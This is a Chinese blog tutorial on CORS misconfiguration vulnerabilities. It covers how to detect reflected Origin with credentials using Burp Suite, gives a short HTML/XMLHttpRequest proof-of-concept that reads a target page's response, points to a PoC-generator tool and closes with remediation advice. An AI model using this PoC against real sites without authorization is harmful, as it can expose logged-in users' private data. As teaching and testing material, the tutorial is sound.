漏洞分析 | CORS讲解与实战利用

最新推荐文章于 2025-04-28 08:30:00 发布
最新推荐文章于 2025-04-28 08:30:00 发布
阅读量2.6k 收藏 29
点赞数 32
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137858944
版权

产生原因

同源策略:如果两个URL的协议、域名、端口号都相同,就称这两个URL同源。

同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一个子域传递到另一个子域,或者在不同域之间进行传递(例如将访问令牌和会话标识符,传递给另一个应用程序)。

为了允许跨域通信,开发人员必须使用不同的技术来绕过SOP并传递敏感信息,以至于现今也成为了一个棘手的安全问题。因此,为了在不影响应用程序安全状态的情况下实现信息共享,在HTML5中引入了跨源资源共享(CORS)。但问题也随之而来,许多人为了方便干脆直接使用默认的配置,或是由于缺乏对此的了解而导致了错误的配置。

CORS跨域资源共享

CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。

手工验证方式

在正常的api请求处,headers加入”origin”:”http://xx.xx.xx.xx“, 如果接口正常返回了数据且headers里包含:

access-control-allow-credentials : trueaccess-control-allow-origin : http://xx.xx.xx.xx

就说明这个接口确实存在CORS漏洞。

实战技巧

使用 burpsuite 选择 Proxy 模块中的 Options 选项,找到Match and Replace这一栏,勾选Request header 将空替换为Origin:foo.example.org的 Enable框。

图片


HTTP history列表中出现符合条件的请求包,发送到Repeater中,点击GO,若存在如下图所示,即该处可能有CORS漏洞。

图片

响应包组合应是这种(存在CORS):

 

  1.  
    Access-Control-Allow-Origin: foo.example.org
     
  2.  
    Access-Control-Allow-Credentials: true
     
 

注意!如下组合是没有漏洞的。因为浏览器已经会阻止如下配置。(不存在CORS)
 

 

  1.  
    Access-Control-Allow-Origin: *
     
  2.  
    Access-Control-Allow-Credentials: true
     
 

利用效果:
 

图片
 

实战:
 

抓包发现请求头中存在Origin,将其修改为*
 

发现Access-Control-Allow-Origin:返回的*
  
 

图片
 


 该处的数据包,所有域可以访问本域的资源。说明该接口可能存在CORS漏洞。
 

以GET的形式POC
 

 

  1.  
    <!DOCTYPE>
     
  2.  
    <html>
     
  3.  
    <script type="text/javascript">
     
  4.  
    function loadXMLDoc()
     
  5.  
    {
     
  6.  
    var xhr = new XMLHttpRequest();
     
  7.  
     
  8.  
    xhr.onreadystatechange=function()
     
  9.  
    {
     
  10.  
    if(xhr.readyState == 4 && xhr.status == 200) //if receive xhr response
     
  11.  
    {
     
  12.  
    var datas=xhr.responseText;
     
  13.  
    alert(datas);
     
  14.  
    }
     
  15.  
    }
     
  16.  
    //request vuln page
     
  17.  
    xhr.open("GET","http://www.target.com","true") //网页地址
     
  18.  
    xhr.send();
     
  19.  
    }
     
  20.  
    loadXMLDoc();
     
  21.  
    </script>
     
  22.  
    </html>
     
 

 

图片
 

不存在CORS漏洞的情况下
 

当进行利用的时候,爆出底下红色部分时:
 

 

图片
 


 则不存在CORS,不允许跨域。
 

工具推荐
 

下载地址:https://github.com/0verSp4ce/PoCBox
 

docker安装:
 

拉取镜像:
 

 

docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
 

运行:
 

 

docker container run -d -p 76:80 registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
 

访问:
 

 

http://ip:76
 

本地搭建好后在图示处填入相关数据后即可生成poc code
 

 

图片
 

利用过程:
 

 

图片
 

效果图如下:
 

 

图片
 


 其中CORS漏洞存在GET方式和POST方式,具体根据实战情况。
 

 

修复建议
 

 
 
1、关闭非正式开启的CORS
 2、白名单限制:定义“源”的白名单,避免使用正则表达式,不要配置Access-Control-Allow-Origin为通配符*或null,严格效验来自请求数据包中Origin的值
 3、仅允许使用安全协议,避免中间人攻击
 

 

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

应急响应笔记
 

 

学习路线
 


                

        

    

  



    


                



	

		

			

				
					
CORS漏洞利用方式的学习(精)

				
			

			

				

					墨痕诉清风的博客
				

				

					10-06
					
					4399
					
				

			

		

		

			
				
返回信息主体是用户敏感信息,需注意的是返回的Access-Control-Allow-Origin是攻击者服务器,这意味着系统存在CORS配置错误。如果支持可以使用iframe跨域请求,绕过。修改一下reqListener()函数为。同理结合上面代码,发送到你的服务器。同上,判断是否支持null。.....................................................................

			
		

	



                

            
              



	

		

			

				
					
软件架构原理实战:深入理解BFF模式及其在微服务中的应用

				
			

			

				

					AI天才研究院
				

				

					12-08
					
					369
					
				

			

		

		

			
				
随着互联网的不断发展,软件架构也不断演进,微服务架构成为了当前最流行的软件架构之一。微服务架构将软件应用程序划分为一系列小的服务,每个服务都独立部署和扩展。这种架构的优点在于它的灵活性、可扩展性和容错性。在微服务架构中,服务之间通过网络进行通信,因此需要一种适合网络通信的架构模式。这就是BFF模式的诞生。BFF(Backing Frontend)模式是一种软件架构模式,它将前端应用程序后端服务分离,每个前端应用程序对应一个后端服务。这种模式的优点在于它可以提高前端应用程序的性能、可维护性和可扩展性。

			
		

	



              


  
              

                


	

		

			

				
					
CORS跨域资源共享漏洞的复现、分析利用及修复过程

				
			

			

				

					Innocence_0的博客
				

				

					02-02
					
					3540
					
				

			

		

		

			
				
CORS跨域资源共享漏洞JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,

			
		

	





	

		

			

				
					
CORS 实战 专题

				
			

			

				

					weixin_33830216的博客
				

				

					08-09
					
					112
					
				

			

		

		

			
				
本文会代码层面对CORS问题进行剖析
CORS相关相关概念可参考http://www.cnblogs.com/softidea/p/5496719.html
 
ERROR info:

XMLHttpRequest cannot load http://localhost:8080/jsonp/scene1/user/1. No 'Access-Control-Allow-Origin...

			
		

	



		

			
		



	

		

			

				
					
关于CORS利用的一些方法

				
			

			

				

					m0_48520508的博客
				

				

					07-17
					
					1155
					
				

			

		

		

			
				
嗨,大家好
我叫Ayoub,我是摩洛哥的安全研究员。在本文中,我将描述两种如何利用CORS错误配置的情况:第一种情况基于XSS,需要在范围之外进行思考,第二种情况是基于高级CORS利用技术。
注意:在开始阅读本文之前,您需要对CORS是什么以及如何利用错误配置有基本的了解。以下是一些很棒的帖子,可让你了解他的用法:
https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
https

			
		

	





	

		

			

				
					
CORS漏洞利用检测和利用方式

				
			

			

				

					alert['Hello World']
				

				

					09-01
					
					5619
					
				

			

		

		

			
				
CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。
检测方式:
1.curl访问网站
curl https://www.junsec.com -H "Origin: https://test.com" -I

检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com
2.burpsuite发送请求包,

			
		

	





	

		

			

				
					
Python Web开发进阶:SimpleHTTPServer的访问控制列表(ACL)CORS配置

				
			

			

				

					
				

			

		

		

			
				
[Python Web开发进阶:SimpleHTTPServer的访问控制列表(ACL)CORS配置](https://journaldev.nyc3.digitaloceanspaces.com/2017/09/python-http-server.png) # 1. Python Web开发SimpleHTTPServer概述  ## 简介 ...

			
		

	





	

		

			

				
					
Python FastAPI库【Web 框架】全面解析实战指南

					
最新发布

				
			

			

				

					记录点滴
				

				

					04-28
					
					841
					
				

			

		

		

			
				
FastAPI是一个现代化的高性能 Python Web 框架,专为构建API(应用程序编程接口)而设计。它以简洁的语法、强大的类型系统、异步支持及自动化文档生成能力著称,适用于开发高效、可扩展且易于维护的 Web 服务。detail="账户余额不足",

			
		

	





	

		

			

				
					
JavaScript面试题大全解析实战技巧

				
			

			

				

					
				

			

		

		

			
				
3. **箭头函数普通函数的区别**:详细讲解箭头函数的特性,如this绑定的不同,以及何时应使用箭头函数。  ### 三、JavaScript高级知识点  1. **异步数据处理**:了解如何使用fetch API进行网络请求,以及处理异步...

			
		

	





	

		

			

				
					
Web渗透SRC漏洞发掘[初级渗透工程师]

				
			

			

				

					2401_88858891的博客
				

				

					01-13
					
					769
					
				

			

		

		

			
				
(10).Burp suite专题(二)Burp+XSSValidator前面XSS已经讲过了。Microsoft SQL Server手注之db_owner权限处理。漏洞挖掘之CSRF(二)——Refrer和token的突破。(9)Burp suite专题(一)Burp+sqlmap。Microsoft SQL Server手注之布尔型盲注。Microsoft SQL Server手注之延时型盲注。(11)Burp suite专题(三)Burp+Xray。

			
		

	





	

		

			

				
					
CORS-POC-Generator:Web脚本,使用HTML CSS和JS生成CORS漏洞的POC

				
			

			

				

					04-07
				

			

		

		

			
				
CORS-POC生成器
Web脚本使用HTML CSS和JS生成CORS漏洞的POC。
 输入URL,如果您看到带有JSON数据的警报,则单击“生成”,然后利用它的可利用性,否则找到另一个端点。
安装
克隆回购文件并运行索引文件吧!
 或实时生成:  :

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞复现——详细利用方法,漏洞危害最大化

				
			

			

				

					
				

				

					06-15
					
					6101
					
				

			

		

		

			
				
CORS跨域资源共享漏洞漏洞复现,cors利用方式以及让危害最大化。

			
		

	





	

		

			

				
					
CORS 跨域资源共享漏洞

				
			

			

				

					weixin_45653478的博客
				

				

					03-21
					
					2436
					
				

			

		

		

			
				
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据。我们先来简单分析一下 CORS 跨域获取资源的过程:CORS 定义了两种跨域请求:简单请求 和 非简单请求。简单跨域请求就是使用设定的请求方式请求数据,而非简单跨域请求则是在使用设定的请求方式请求数据之前,先发送一个 OPTIONS 预检请求,验证请求源是否为服务端允许源。

			
		

	





	

		

			

				
					
常见的Web漏洞——CORS

				
			

			

				

					江左盟的博客
				

				

					06-05
					
					3003
					
				

			

		

		

			
				
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞CORS漏洞原理、检测和利用方法。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值